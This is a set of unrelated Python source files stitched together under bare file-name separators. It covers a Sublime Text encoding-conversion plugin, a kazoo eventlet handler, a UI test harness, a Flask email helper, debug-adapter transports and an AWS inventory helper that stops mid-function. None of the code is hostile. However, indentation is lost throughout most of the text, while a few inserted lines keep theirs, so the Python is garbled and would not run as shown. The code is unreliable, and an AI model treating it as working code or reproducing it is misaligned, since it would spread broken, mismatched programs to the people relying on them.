os.chmod(tmp_name, os.stat(file_name)[0])
shutil.move(tmp_name, file_name)
else:
# copy the timestamp from original file
mtime = os.path.getmtime(file_name)
os.utime(tmp_name, (mtime, mtime))
encoding_cache.set(file_name, encoding)
view.settings().set('prevent_detect', True)
sublime.status_message('UTF8 -> {0}'.format(encoding))
def description(self):
encoding = self.view.settings().get('origin_encoding')
if not encoding:
return
return 'UTF8 -> {0}'.format(encoding)
class ConvertTextToUtf8Command(sublime_plugin.TextCommand):
def get_text(self, region):
content = self.view.substr(region)
try:
return content.encode('CP1252')
except Exception:
return None
def detect(self, begin_line, end_line):
begin_line = int(begin_line)
end_line = int(end_line)
begin_point = self.view.text_point(begin_line + 1, 0)
end_point = self.view.text_point(end_line, 0) - 1
region = sublime.Region(begin_point, end_point)
content = self.get_text(region)
if not content:
return
detector = UniversalDetector()
detector.feed(content)
detector.close()
encoding = detector.result['encoding']
confidence = detector.result['confidence']
if not encoding:
    return
encoding = encoding.upper()
if confidence < SETTINGS['confidence'] or encoding in SKIP_ENCODINGS:
return
self.view.run_command('convert_text_to_utf8', {'begin_line': begin_line, 'end_line': end_line, 'encoding': encoding})
def run(self, edit, begin_line, end_line, encoding = None):
begin_line = int(begin_line)
end_line = int(end_line)
if not encoding:
# detect the encoding
sublime.set_timeout(lambda: self.detect(begin_line, end_line), 0)
return
view = self.view
last_line = begin_line + 50
if last_line > end_line:
last_line = end_line
begin_point = view.text_point(begin_line + 1, 0)
end_point = view.text_point(last_line, 0) - 1
region = sublime.Region(begin_point, end_point)
text = self.get_text(region)
while True:
if encoding:
try:
text = text.decode(encoding)
except UnicodeDecodeError:
encoding = SUPERSETS.get(encoding)
continue
break
else:
return
view.replace(edit, region, text)
if last_line < end_line:
view.run_command('convert_text_to_utf8', {'begin_line': last_line, 'end_line': end_line, 'encoding': encoding})
def is_enabled(self):
return get_setting(self.view, 'convert_on_find')
class ConvertToUTF8Listener(sublime_plugin.EventListener):
def is_find_results(self, view):
return view.settings().get('syntax') == 'Packages/Default/Find Results.hidden-tmLanguage'
def check_clones(self, view):
clone_numbers = view.settings().get('clone_numbers', 0)
if clone_numbers:
check_times = view.settings().get('check_times', clone_numbers)
if check_times:
view.settings().set('check_times', check_times - 1)
return True
view.settings().erase('check_times')
return False
def on_new(self, view):
if self.is_find_results(view):
view.settings().set('last_lines', 0)
return
if get_setting(view, 'default_encoding_on_create'):
init_encoding_vars(view, get_setting(view, 'default_encoding_on_create'), False)
def on_clone(self, view):
clone_numbers = view.settings().get('clone_numbers', 0)
view.settings().set('clone_numbers', clone_numbers + 1)
encoding = view.settings().get('origin_encoding')
if encoding:
view.set_status('origin_encoding', encoding)
def on_close(self, view):
clone_numbers = view.settings().get('clone_numbers', 0)
if clone_numbers:
view.settings().set('clone_numbers', clone_numbers - 1)
else:
remove_reverting(view.file_name())
if self.is_find_results(view):
view.settings().erase('last_lines')
def on_load(self, view):
encoding = view.encoding()
if encoding == 'Hexadecimal' or encoding.endswith(' BOM'):
return
# if Sublime Text already loaded the file correctly, there is no need to check its encoding
if encoding not in ('Undefined', view.settings().get('fallback_encoding')):
return
file_name = view.file_name()
if not file_name:
return
if self.check_clones(view):
return
encoding = view.settings().get('origin_encoding')
if encoding and not view.get_status('origin_encoding'):
view.set_status('origin_encoding', encoding)
# file is reloading
if view.settings().get('prevent_detect'):
if view.is_dirty():
# changes have not been saved
sublime.set_timeout(lambda: self.on_deactivated(view), 0)
return
else:
# treat as a new file
sublime.set_timeout(lambda: self.clean_reload(view, file_name), 250)
return
else:
return
if not get_setting(view, 'convert_on_load'):
return
self.perform_action(view, file_name, 5)
def on_activated(self, view):
if view.settings().get('is_preview'):
self.perform_action(view, view.file_name(), 3)
def is_preview(self, view):
window = view.window()
if not window:
return True
view_index = window.get_view_index(view)
return view_index[1] == -1
def clean_reload(self, view, file_name):
window = view.window()
if not window:
sublime.set_timeout(lambda: self.clean_reload(view, file_name), 100)
return
for v in window.views():
if v.file_name() == file_name:
v.settings().erase('prevent_detect')
cnt = get_setting(view, 'max_detect_lines')
threading.Thread(target=lambda: detect(view, file_name, cnt)).start()
def perform_action(self, view, file_name, times):
if not get_setting(view, 'preview_action') and self.is_preview(view):
if times > 0:
# give it another chance before everything is ready
sublime.set_timeout(lambda: self.perform_action(view, file_name, times - 1), 100)
return
view.settings().set('is_preview', True)
return
view.settings().erase('is_preview')
cnt = get_setting(view, 'max_detect_lines')
threading.Thread(target=lambda: detect(view, file_name, cnt)).start()
def on_modified(self, view):
encoding = view.encoding()
if encoding == 'Hexadecimal':
return
file_name = view.file_name()
if not file_name or view.is_loading():
if get_setting(view, 'convert_on_find') and self.is_find_results(view):
begin_line = view.settings().get('last_lines', 0)
end_line = view.rowcol(view.size())[0]
if end_line > begin_line:
view.settings().set('last_lines', end_line)
begin_point = view.text_point(begin_line, 0)
line = view.line(begin_point)
text = view.substr(line)
if text.endswith(':'):
# find the file name
file_name = text[:-1]
# skip opened file
if view.window().find_open_file(file_name):
return
encoding = encoding_cache.get(file_name)
if encoding in SKIP_ENCODINGS:
return
sublime.set_timeout(lambda: view.run_command('convert_text_to_utf8', {'begin_line': begin_line, 'end_line': end_line, 'encoding': encoding}), 0)
return
if not view.settings().get('in_converting'):
if view.settings().get('is_preview'):
view.settings().erase('is_preview')
detect(view, file_name, get_setting(view, 'max_detect_lines'))
return
if self.check_clones(view):
return
command = view.command_history(0, True)
command1 = view.command_history(1, True)
if command == NONE_COMMAND:
if command1[0] == 'convert_to_utf8':
view.run_command('redo')
else:
view.set_scratch(not view.settings().get('is_init_dirty_state', False))
elif command[0] == 'convert_to_utf8':
if file_name in stamps:
if stamps[file_name] == command[1].get('stamp'):
view.set_scratch(True)
elif command[0] == 'revert':
if command1 == NONE_COMMAND:
# on_modified will be invoked twice for each revert
if file_name not in REVERTING_FILES:
REVERTING_FILES.insert(0, file_name)
return
remove_reverting(file_name)
if view.settings().get('prevent_detect'):
sublime.set_timeout(lambda: self.undo_me(view), 0)
else:
# file was modified outside
cnt = get_setting(view, 'max_detect_lines')
threading.Thread(target=lambda: detect(view, file_name, cnt)).start()
else:
view.set_scratch(False)
def undo_me(self, view):
view.settings().erase('prevent_detect')
view.run_command('undo')
# restore folded regions
regions = view.settings().get('folded_regions')
if regions:
view.settings().erase('folded_regions')
folded = [sublime.Region(int(region[0]), int(region[1])) for region in regions]
view.fold(folded)
vp = view.settings().get('viewport_position')
if vp:
view.settings().erase('viewport_position')
view.set_viewport_position((vp[0], vp[1]), False)
# st3 will reload file immediately
if view.settings().get('revert_to_scratch') or (ST3 and not get_setting(view, 'lazy_reload')):
view.set_scratch(True)
def on_deactivated(self, view):
# st2 will reload file when on_deactivated
if view.settings().get('prevent_detect'):
file_name = view.file_name()
if get_setting(view, 'lazy_reload'):
tmp_name = os.path.join(TMP_DIR, get_temp_name(file_name))
os.chmod(tmp_name, os.stat(file_name)[0])
shutil.move(tmp_name, file_name)
remove_reverting(file_name)
view.settings().set('revert_to_scratch', not view.is_dirty())
# make ST stop asking about reloading
view.run_command('revert')
def on_pre_save(self, view):
if view.encoding() == 'Hexadecimal' or view.encoding().endswith(' BOM'):
return
force_encoding = view.settings().get('force_encoding')
if force_encoding == 'UTF-8':
view.set_encoding(force_encoding)
return
if not view.settings().get('in_converting'):
return
if self.check_clones(view):
return
view.set_encoding('UTF-8')
def on_post_save(self, view):
view_encoding = view.encoding()
if view_encoding == 'Hexadecimal':
return
if not view.settings().get('in_converting'):
return
if self.check_clones(view):
return
file_name = view.file_name()
if file_name in stamps:
del stamps[file_name]
if not get_setting(view, 'convert_on_save'):
return
# file was saved with other encoding
if view_encoding != 'UTF-8':
clean_encoding_vars(view)
return
view.run_command('convert_from_utf8')
|
eventlet.py
|
"""A eventlet based handler."""
from __future__ import absolute_import
import contextlib
import logging
import eventlet
from eventlet.green import select as green_select
from eventlet.green import socket as green_socket
from eventlet.green import time as green_time
from eventlet.green import threading as green_threading
from eventlet import queue as green_queue
from kazoo.handlers import utils
import kazoo.python2atexit as python2atexit
LOG = logging.getLogger(__name__)
# sentinel objects
_STOP = object()
@contextlib.contextmanager
def _yield_before_after():
# Yield to any other co-routines...
#
# See: http://eventlet.net/doc/modules/greenthread.html
# for how this zero sleep is really a cooperative yield to other potential
# co-routines...
eventlet.sleep(0)
try:
yield
finally:
eventlet.sleep(0)
class TimeoutError(Exception):
pass
class AsyncResult(utils.AsyncResult):
"""A one-time event that stores a value or an exception"""
def __init__(self, handler):
super(AsyncResult, self).__init__(handler,
green_threading.Condition,
TimeoutError)
class SequentialEventletHandler(object):
"""Eventlet handler for sequentially executing callbacks.
This handler executes callbacks in a sequential manner. A queue is
created for each of the callback events, so that each type of event
has its callback type run sequentially. These are split into two
queues, one for watch events and one for async result completion
callbacks.
Each queue type has a greenthread worker that pulls the callback event
off the queue and runs it in the order the client sees it.
This split helps ensure that watch callbacks won't block session
re-establishment should the connection be lost during a Zookeeper
client call.
Watch and completion callbacks should avoid blocking behavior as
the next callback of that type won't be run until it completes. If
you need to block, spawn a new greenthread and return immediately so
callbacks can proceed.
.. note::
Completion callbacks can block to wait on Zookeeper calls, but
no other completion callbacks will execute until the callback
returns.
"""
name = "sequential_eventlet_handler"
def __init__(self):
"""Create a :class:`SequentialEventletHandler` instance"""
self.callback_queue = green_queue.LightQueue()
self.completion_queue = green_queue.LightQueue()
self._workers = []
self._started = False
@staticmethod
def sleep_func(wait):
green_time.sleep(wait)
@property
def running(self):
return self._started
timeout_exception = TimeoutError
def _process_completion_queue(self):
while True:
cb = self.completion_queue.get()
if cb is _STOP:
break
try:
with _yield_before_after():
cb()
except Exception:
LOG.warning("Exception in worker completion queue greenlet",
exc_info=True)
def _process_callback_queue(self):
while True:
cb = self.callback_queue.get()
if cb is _STOP:
break
try:
with _yield_before_after():
cb()
except Exception:
LOG.warning("Exception in worker callback queue greenlet",
exc_info=True)
def start(self):
if not self._started:
# Spawn our worker threads, we have
# - A callback worker for watch events to be called
# - A completion worker for completion events to be called
w = eventlet.spawn(self._process_completion_queue)
self._workers.append((w, self.completion_queue))
w = eventlet.spawn(self._process_callback_queue)
self._workers.append((w, self.callback_queue))
self._started = True
python2atexit.register(self.stop)
def stop(self):
while self._workers:
w, q = self._workers.pop()
q.put(_STOP)
w.wait()
self._started = False
python2atexit.unregister(self.stop)
def socket(self, *args, **kwargs):
return utils.create_tcp_socket(green_socket)
def create_socket_pair(self):
return utils.create_socket_pair(green_socket)
def event_object(self):
return green_threading.Event()
def lock_object(self):
return green_threading.Lock()
def rlock_object(self):
return green_threading.RLock()
def create_connection(self, *args, **kwargs):
return utils.create_tcp_connection(green_socket, *args, **kwargs)
def select(self, *args, **kwargs):
with _yield_before_after():
return green_select.select(*args, **kwargs)
def async_result(self):
return AsyncResult(self)
def spawn(self, func, *args, **kwargs):
t = green_threading.Thread(target=func, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def dispatch_callback(self, callback):
self.callback_queue.put(lambda: callback.func(*callback.args))
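# A minimal usage sketch (not executed on import), assuming a reachable ZooKeeper;
# the connection string is an illustrative placeholder.
def _example_usage():
    from kazoo.client import KazooClient
    client = KazooClient(hosts='127.0.0.1:2181',
                         handler=SequentialEventletHandler())
    client.start()
    return client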
|
__init__.py
|
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import threading
import Queue
import ui
import time
import gc
import traceback
from util.logging import *
from util.message_loop import *
# a run command issued to the UI is treated as hung if this many seconds elapse
UI_THREAD_TIMEOUT = 10
class UIThreadException(Exception):
def __init__(self,exc,msg):
self._inner_exception = exc
self._message = msg
@property
def inner_exception(self):
return self._inner_exception
def __str__(self):
return self._message
class UITimeoutException(Exception):
pass
class UITestHarness(object):
def __init__(self,options=None):
self._mc = None
self._loaded = threading.Event()
self._options = options
log2("UITestHarness: Starting UI")
self._ui_thread = threading.Thread(target=self._ui_main)
self._ui_thread.setName("ndbg UI thread")
self._ui_thread.start()
log2("UITestHarness: *********************************")
log2("UITestHarness: Waiting for UI to become responsive")
self._loaded.wait(5)
if not self._loaded.is_set():
log2("UITestHarness: UI is not responding. Test harness init failed.")
raise Exception("Timed out initializing the UI")
log2("UITestHarness: UI is up.")
self._loaded = None
def _ui_main(self):
log2("UI thread: ui running.")
def on_load_cb(mc):
log2("UI thread: ui loaded. Notifying test thread.")
self._mc = mc
self._loaded.set()
ui.run(self._options, on_load_cb)
log2("UI thread: ui stoped.")
def run_on_ui(self,cb,timeout):
"""Runs cb(mc) on the UI thread, where mc is the MainControl object for the UI.
timeout is the amount of time to wait before considering the test hung.
"""
exceptions = []
ret = []
done_event = threading.Event()
def run_uitest_cmd():
log2("UI thread: run_uitest_cmd begin...")
if MessageLoop.has_unhandled_exceptions():
excs = MessageLoop.get_unhandled_exceptions()
assert len(excs) != 0
uberexc = "Original exception:\n" + "\n\n".join(excs)
MessageLoop.reset_unhandled_exceptions()
exceptions.append(Exception("Unhandled exceptions"))
exceptions.append(uberexc)
log2("UI thread: run_uitest_cmd aborted due to unhandled exceptions.")
done_event.set()
return
try:
rv = cb(self._mc)
ret.append(rv)
except Exception,exc:
log2("Exception raised when processing an add_message")
fmt = traceback.format_exc()
exceptions.append(exc)
exceptions.append(fmt)
log2("UI thread: run_uitest_cmd done.")
done_event.set()
MessageLoop.add_message(run_uitest_cmd)
done_event.wait(timeout=timeout)
if not done_event.is_set():
log2("UITestHarness: run_uitest_cmd timed out.")
raise UITimeoutException("Test timed out.")
else:
log2("UITestHarness: run_uitest_cmd done.")
if len(ret):
return ret[0]
else:
exc = exceptions[0]
formatted_exc = exceptions[1]
raise UIThreadException(exc, formatted_exc)
def tearDown(self):
log2("UITestHarness: Begin teardown")
if self._ui_thread == None:
log2("UITestHarness: Teardown stopped, already torn down")
return
log2("UITestHarness: Telling UI thread to exit.")
MessageLoop.quit()
# wait for the UI thread to exit
self._ui_thread.join()
self._ui_thread = None
self._mc = None
log2("UITestHarness: UI thread has exited. Teardown complete.")
gc.collect()
class UITestCaseBase(unittest.TestCase):
def setUp(self,options=None):
self._harness = UITestHarness(options)
def run_on_ui(self, cb, timeout=UI_THREAD_TIMEOUT):
"""Runs cb(mc) on the UI thread. The return value or excception
are returned synchronously to the test thread."""
return self._harness.run_on_ui(cb,timeout)
def assertNoUnhandledExceptions(self):
def do_nothing(mc):
pass
self.run_on_ui(do_nothing)
def pause(self):
import sys
sys.stdout.write("Press enter to continue test...\n")
sys.stdin.readline()
def tearDown(self):
self._harness.tearDown()
class UITestCaseSingle(UITestCaseBase):
def setUp(self,testapp,options=None):
UITestCaseBase.setUp(self,options)
self.run_on_ui(lambda mc: mc.debugger.begin_launch_suspended(testapp).wait())
class UITestCaseMultiple(UITestCaseBase):
def setUp(self,launch,options=None):
"""Initializes the UI with the specified options and launches the
specified applications.
launch should be a list of applications or applications + arguments to launch_suspended.
options is the ndbg-style options result from optparse to be passed to the UI.
"""
UITestCaseBase.setUp(self,options)
i = 1
for testapp in launch:
proc = self.run_on_ui(lambda mc: mc.debugger.begin_launch_suspended(testapp).wait())
attrname = "proc%i" % i
setattr(self,attrname,proc)
i += 1
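# --- usage sketch (assumption, not part of the original module) ---
# Illustrates how a concrete test can drive the UI through run_on_ui(); the
# test body is hypothetical but only uses methods defined above.
class ExampleUITestCase(UITestCaseBase):
    def test_ui_processes_messages(self):
        # A no-op callback returning None proves the message loop is alive.
        self.run_on_ui(lambda mc: None)
        self.assertNoUnhandledExceptions()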
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['EMAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['EMAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
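# --- usage sketch (assumption, not part of the original module) ---
# Shows how a view would typically call send_email(); the template name
# ('email/confirm') and the user/token keyword arguments are hypothetical.
def _example_send_confirmation(user, token):
    # Renders email/confirm.txt and email/confirm.html with user and token in
    # the template context and delivers the message on a background thread.
    return send_email(user.email, 'Confirm Your Account',
                      'email/confirm', user=user, token=token)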
|
transports.py
|
from ...typecheck import *
from ...import core
from ..dap import Transport
import socket
import os
import subprocess
import threading
class Process:
@staticmethod
async def check_output(command: List[str]) -> bytes:
return await core.run_in_executor(lambda: subprocess.check_output(command))
def __init__(self, command: List[str], cwd: Optional[str]):
# taken from Default/exec.py
# Hide the console window on Windows
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() #type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW #type: ignore
self.process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
shell=False,
bufsize=0,
startupinfo=startupinfo,
cwd = cwd)
self.stdin = self.process.stdin
self.stderr = self.process.stderr
self.stdout = self.process.stdout
self.closed = False
def _readline(self, pipe) -> bytes:
if l := pipe.readline():
return l
raise EOFError
def _read(self, pipe, n: int) -> bytes:
if l := pipe.read(n):
return l
raise EOFError
async def readline(self, pipe) -> bytes:
return await core.run_in_executor(lambda: self._readline(pipe))
async def read(self, pipe, nbytes) -> bytes:
return await core.run_in_executor(lambda: self._read(pipe, nbytes))
def dispose(self):
self.closed = True
try:
self.process.terminate()
except Exception as e:
core.log_exception()
class StdioTransport(Transport):
def __init__(self, log: core.Logger, command: List[str], cwd: Optional[str] = None):
self.process = Process(command, cwd)
thread = threading.Thread(target=self._read, args=(self.process.stderr, log.info))
thread.start()
def _read(self, file: Any, callback: Callable[[str], None]) -> None:
while True:
try:
line = file.read(2**15).decode('UTF-8')
if not line:
core.log_info("Nothing to read from process, closing")
break
core.call_soon_threadsafe(callback, line)
except Exception as e:
core.log_exception()
break
self.process.dispose()
def write(self, message: bytes) -> None:
self.process.stdin.write(message)
self.process.stdin.flush()
def readline(self) -> bytes:
if l := self.process.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.process.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
self.process.dispose()
class SocketTransport(Transport):
def __init__(self, log: core.Logger, host: str, port: int, cwd: Optional[str] = None):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((host, port))
self.stdin = self.socket.makefile('wb')
self.stdout = self.socket.makefile('rb')
def write(self, message: bytes) -> None:
self.stdin.write(message)
self.stdin.flush()
def readline(self) -> bytes:
if l := self.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
try:
self.socket.close()
except:
core.log_exception()
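# --- usage sketch (assumption, not part of the original module) ---
# Illustrates how the two transports above might be constructed by a debug
# adapter configuration; the adapter command and port number are hypothetical.
def _example_create_transport(log: core.Logger, use_socket: bool) -> Transport:
    if use_socket:
        # Attach to an adapter that is already listening on a local TCP port.
        return SocketTransport(log, 'localhost', 5678)
    # Otherwise spawn the adapter process and communicate over stdio.
    return StdioTransport(log, ['python', 'adapter.py'])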
|
aws_helper.py
|
import os, sys, collections
import boto, boto.ec2
from atlas_helper_methods import *
import re, datetime
import memcache
from concurrent.futures import ThreadPoolExecutor
import chef
from chef import DataBag, DataBagItem
from dateutil import parser
from dateutil import tz
from collections import OrderedDict, defaultdict
import threading
class AwsHelper:
def __init__(self):
self.ah_obj = AtlasHelper()
self.module = "aws_module"
self.instance_info = []
self.env_subnet_dict={}
self.environment_dict = {}
self.memcache_var = memcache.Client([self.ah_obj.get_atlas_config_data("global_config_data",'memcache_server_location')], debug=0)
self.environment_details = {}
self.regions_for_env_dict = {}
def get_databag_attributes(self, atlas_set_header, databag_set_name):
"""
Returns all items of a databag given the header and databag name in the atlas config file.
"""
data_bag_attr = {}
base_path = self.ah_obj.get_atlas_config_data("chef_module", 'chef-base-path')
api = chef.autoconfigure(base_path)
chef_databags = self.ah_obj.get_atlas_config_data(atlas_set_header, databag_set_name)[1]
for databag in chef_databags.keys():
data_bag = DataBag(databag,api)
key_list = {}
items = chef_databags[databag]['items'].keys()
for item_index in items:
key_list = chef_databags[databag]['items'][item_index]['keys']
chef_databag_item = DataBagItem(databag,item_index,api)
for item_keys, item_values in chef_databag_item.iteritems():
if item_keys in key_list:
data_bag_attr[item_keys] = item_values
elif type(item_values) == dict:
data_bag_attr[item_keys] = {}
for key in key_list:
attr_values = self.ah_obj.get_nested_attribute_values(item_values, key)
data_bag_attr[item_keys][key] = attr_values
return data_bag_attr
def get_databag_attrs_fromcache(self, atlas_set_header, databag_set_name):
"""
        Check the short-term cache first; fall back to the long-term cache and refresh it asynchronously.
"""
db_attribute_dict = self.memcache_var.get('atlas_yaml')
if not db_attribute_dict:
db_attribute_dict = self.memcache_var.get('global_atlas_yaml')
if db_attribute_dict is not None:
self.memcache_var.set("atlas_yaml", db_attribute_dict, 10800)
with threading.Lock():
thread = threading.Thread(target=self.cache_databag_attributes, args=[atlas_set_header, databag_set_name])
thread.start()
return db_attribute_dict
def cache_databag_attributes(self, atlas_set_header, databag_set_name):
"""
Fetch databag attributes from chef server using keys defined in atlas configuration file and cache it locally.
"""
try:
databag_attribute_dict = self.get_databag_attributes(atlas_set_header, databag_set_name)
if databag_attribute_dict is None:
raise Exception("The infrastructure data is not available. Please make sure you get the data from atlas.yaml and populate the cache !!!")
if databag_attribute_dict:
self.memcache_var.set("atlas_yaml", databag_attribute_dict, 15*60)
self.memcache_var.set("global_atlas_yaml",databag_attribute_dict, 24*60*60)
self.memcache_var.disconnect_all()
        except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "cache_databag_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def initialize_environments(self, organization, env_list):
"""
Construct an initial dictionary self.environment_dict.
"""
aws_variables = self.ah_obj.get_atlas_config_data(self.module, "status")[0]
self.regions_for_env_dict = self.regions_for_env()
for environment in env_list:
self.environment_dict['organizations'][organization]['environments'][environment] = {'regions':{}}
temp_env_regions = self.environment_dict['organizations'][organization]['environments'][environment]['regions']
region_list = self.regions_for_env_dict[environment]
for region in region_list:
if environment == 'uncategorized':
temp_env_regions[region] = {'uncat_instances': {}}
for variables in aws_variables:
temp_env_regions[region][variables]= 0
else:
temp_env_regions[region] = {'vpc':{}}
for variables in aws_variables:
temp_env_regions[region][variables]= 0
vpc_list = self.get_vpc_in_region(region)
if vpc_list:
for vpc in vpc_list:
if vpc:
temp_env_regions[region]['vpc'][vpc] = {'subnets':{}}
for variables in aws_variables:
temp_env_regions[region]['vpc'][vpc][variables]= 0
subnets = self.get_subnets_in_environment(region, vpc,environment)
for subnet in subnets:
temp_env_regions[region]['vpc'][vpc]['subnets'][subnet] = {'instances':{}}
self.env_subnet_dict[(subnet, vpc, region)]=environment
def initialize_instance_dictionary(self):
"""
Initialize the dictionary.
"""
env_list=[]
self.environment_dict = {'organizations':{}}
try:
for organization in self.get_organizations():
                self.environment_dict['organizations'][organization] = {'environments': {}}
                env_list = self.get_environments(organization)
                env_list.append('uncategorized')
self.initialize_environments(organization, env_list)
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "initialize_instance_dictionary()", exp_object, exc_type, exc_obj, exc_tb)
return
def parse_application_name(self, instance_name):
"""
a dictionary for regex patterns for instance names
this should be moved to the configuration file
"""
application_regex_dictionary = self.ah_obj.get_atlas_config_data(self.module, "instances-regex")[1]
# by iterating through the dictionary we can determine if an instance runs an application
for key, values in application_regex_dictionary.iteritems():
for pattern in values:
if re.match("^"+pattern+"$", instance_name):
return key
return "uncategorized"
def get_duration(self, instance):
"""
        Get the uptime of an instance, measured from its launch time.
"""
duration = instance.__dict__.get("launch_time")
local_time_duration = datetime.datetime.now().replace(tzinfo=tz.tzlocal())-parser.parse(str(duration)).astimezone(tz.tzlocal())
return local_time_duration
def timedelta_to_duration(self,timedelta):
"""
this method receives date information in timedelta format
the hours, minutes and seconds are retrieved in hours, minutes and seconds
"""
return str(timedelta.days)+"d "+str(timedelta.seconds//3600)+"h "+str((timedelta.seconds//60)%60)+"m"
def count_return_state(self, instances, count_dict):
"""
Count the number of instances based on _state.
"""
instance_state=""
try:
count_dict['count']+=1;
if str(instances.__dict__.get('_state', 'none')) == "running(16)":
instance_state = "running"
count_dict['running']+=1;
if str(instances.__dict__.get('_state', 'none')) == 'stopped(80)':
instance_state="stopped"
count_dict['stopped']+=1;
return instance_state
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("awshelper.py", "count_return_state()", exp_object, exc_type, exc_obj, exc_tb)
return "None"
def cache_aws_instances_information(self):
"""
Cache the instances information using memcache.
"""
try:
aws_inst_dict = self.get_aws_instances_information()
self.memcache_var.set("aws_instances_details_cache", aws_inst_dict,60*60)
if aws_inst_dict is None:
raise Exception('AWS instance data is empty. Please check if data is available from AWS and populate the cache !!!')
if aws_inst_dict is not None:
self.memcache_var.set("global_aws_cache", aws_inst_dict,86400)
self.memcache_var.disconnect_all()
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("awshelper.py", "cache_aws_instances_information()", exp_object, exc_type, exc_obj, exc_tb)
self.memcache_var.disconnect_all()
def get_instances_details(self):
"""
Get details of all instances.
"""
instance_details = self.memcache_var.get("aws_instances_details_cache")
self.memcache_var.disconnect_all()
if not instance_details:
instance_details = self.memcache_var.get("global_aws_cache")
if instance_details is not None:
self.memcache_var.set('aws_instances_details_cache', instance_details,2*60*60)
with threading.Lock():
thread = threading.Thread(target=self.cache_aws_instances_information)
thread.start()
return instance_details
def get_aws_instances_information(self):
try:
self.initialize_instance_dictionary()
organizations_list = self.get_organizations();
instances_list = []
if organizations_list:
for organization in organizations_list:
region_list = self.get_regions()
for region in region_list:
conn_obj = self.get_aws_connection(region)
instances_list = self.get_aws_instances(conn_obj)
images_list = conn_obj.get_all_images()
aws_images_dict = {}
for image in images_list:
aws_images_dict[image.id] = image
with ThreadPoolExecutor(max_workers=3) as executor:
future = executor.submit(self.fetch_awsinstance_info, organization, region, region_list, instances_list, aws_images_dict, conn_obj)
self.memcache_var.set("aws_instances_details_cache", self.environment_dict)
self.memcache_var.disconnect_all()
return self.environment_dict
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("helper.py", "get_aws_instances_information()", exp_object, exc_type, exc_obj, exc_tb)
return
def fetch_awsinstance_info(self, organization, region, region_list, instances_list, aws_images_dict, conn_obj):
"""
Fetch and parse all instances information to create aws information dictionary object.
"""
try:
for instances in instances_list:
#read knife tags and atlas tags
knife_tags = instances.tags.get('knife_tags');
atlas_tags = {} #should read through boto in the future
aws_instance_name = ""
if knife_tags:
vpc = knife_tags['vpc'];
instance_subnet = knife_tags['subnet']
application_name = knife_tags['stack']
instance_name = knife_tags['hostname']
#else get attributes from atlas tags
elif atlas_tags:
pass
else:
#use other aws tags or parse the instance name to get instance attributes
vpc_id = str(instances.__dict__.get('vpc_id', 'none'))
vpc = self.get_vpc_by_id(vpc_id, region)
instance_subnet = "none"
environment=""
if vpc:
subnet_id = str(instances.__dict__.get('subnet_id'))
if subnet_id:
instance_subnet = self.get_subnet_byid(subnet_id, region, vpc)
else:
instance_subnet ='none'
aws_instance_name = re.split('[:,.;_-]', instances.tags.get('Name', 'none'))
instance_name = aws_instance_name[2] if len(aws_instance_name)==3 else instances.tags.get('Name', 'none')
application_name = self.parse_application_name(instance_name)
stack_list = self.get_stack()
if (instance_subnet,vpc,region) in self.env_subnet_dict.keys():
environment=self.env_subnet_dict[(instance_subnet, vpc, region)]
env_regions = self.regions_for_env_dict[environment]
else:
environment = "uncategorized"
env_regions = region_list
if region not in env_regions:
pass
else:
#read other instance tags
instance_tags = instances.tags
instance_id = instances.__dict__['id']
instance_type = instances.__dict__['instance_type']
instance_ip_address = instances.__dict__['private_ip_address']
image_id = instances.__dict__['image_id']
image_name = ""
if image_id in aws_images_dict:
image_name = aws_images_dict[image_id].name
instance_attribute_dict = collections.defaultdict(dict)
instance_attribute_dict['region'] = region
instance_attribute_dict['vpc'] = vpc
instance_attribute_dict['subnet'] = instance_subnet
instance_attribute_dict['instance_id'] = instance_id
instance_attribute_dict['instance'] = instance_name
instance_attribute_dict['application'] = application_name
instance_attribute_dict['instance_type'] = instance_type
aws_information_dict = collections.defaultdict(dict)
aws_information_dict['instance_id'] = instance_id
aws_information_dict['instance_type'] = instance_type
aws_information_dict['private_ip_addr'] = instance_ip_address
aws_information_dict['image_id'] = image_id
aws_information_dict['image_name'] = image_name
aws_tags = instance_tags
if not vpc or instance_subnet == 'none' or application_name == 'uncategorized':
environment = 'uncategorized'
uncategorized_dict = self.environment_dict['organizations'][organization]['environments'][environment]['regions'][region]
                        instance_attribute_dict['status'] = self.count_return_state(instances, uncategorized_dict)
                        # record the duration before the attribute dict is copied below
                        instance_attribute_dict['duration'] = self.timedelta_to_duration(self.get_duration(instances))
                        uncategorized_dict['uncat_instances'][instance_name] = {'instance_attributes': {}, 'aws_information': {}}
                        uncategorized_dict['uncat_instances'][instance_name]['instance_attributes'] = dict(instance_attribute_dict)
